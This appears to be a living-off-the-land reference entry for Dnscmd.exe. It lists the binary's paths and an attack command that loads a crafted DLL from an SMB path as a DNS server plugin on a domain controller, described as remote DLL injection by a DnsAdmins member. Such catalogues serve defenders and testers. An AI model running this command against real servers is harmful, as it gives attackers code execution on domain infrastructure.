Dnscmd.exe

A command-line interface for managing DNS servers

Paths

  • C:\Windows\System32\Dnscmd.exe
  • C:\Windows\SysWOW64\Dnscmd.exe

Commands

Execute

Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.

Use case: Remotely inject dll to dns server

Privileges: DNS admin

dnscmd.exe dc1.lab.int /config /serverlevelplugindll {PATH_SMB:.dll}

Detection

Resources